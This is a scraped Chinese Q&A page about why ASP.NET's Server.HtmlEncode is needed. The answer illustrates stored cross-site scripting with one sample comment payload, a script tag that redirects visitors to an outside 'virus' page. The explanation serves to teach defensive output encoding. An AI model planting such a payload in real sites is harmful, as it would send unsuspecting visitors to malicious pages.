asp.net – 为什么需要Server.HtmlEncode?
发布时间:2020-12-16 07:27:44 所属栏目:asp.Net 来源:网络整理
导读:我无法理解为什么需要Server. HtmlEncode? MSDN声明它用于将可能不安全的字符编码为HTML编码的等效字符. 有人可以告诉我这些字符是如何不安全的,并要求我们使用Server.HtmlEncode? 谢谢. 解决方法 角色如何不安全的一个例子是用户是否在您的页面上提交评论
|
我无法理解为什么需要Server.
HtmlEncode? MSDN声明它用于将可能不安全的字符编码为HTML编码的等效字符.
有人可以告诉我这些字符是如何不安全的,并要求我们使用Server.HtmlEncode? 谢谢. 解决方法
角色如何不安全的一个例子是用户是否在您的页面上提交评论.如果评论表单不使用HtmlEncode,那么用户刚输入的任何内容现在都将作为页面上的注释显示.在这种情况下,黑客可以提交如下评论:
<script language="javascript" type="text/javascript"> window.location = 'http://server.com/viruspage.asp'; </script> 对于加载页面的每个后续用户,脚本将运行(因为它尚未使用HtmlEncode编码),将每个用户重定向到带有病毒的页面.这是一个非常简单的示例,但是还有许多其他方法可以输入恶意数据,甚至可能让黑客对您的数据库进行管理访问. (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
相关内容
- 如何在ASP.NET中的多个Web应用程序中维护相同的会话ID
- asp.net-mvc – 使用没有ORM的ASP.NET MVC
- ASP.NET身份
- asp.net – 使用主题的css文件需要在页面上的头控件 (例如)
- asp.net-mvc – 初学者的分析Qn – ASP .NET MVC Mini-Prof
- asp.net – Dapper.net交易问题
- asp.net-mvc – 为可为空的DateTime呈现的不显眼的验证属性
- asp.net – 引用不稳定的DLL
- asp.net – WebBrowsable vs个性化Web部件
- asp.net-mvc – ASP.NET MVC:返回查询字符串完整的视图
推荐文章
站长推荐
热点阅读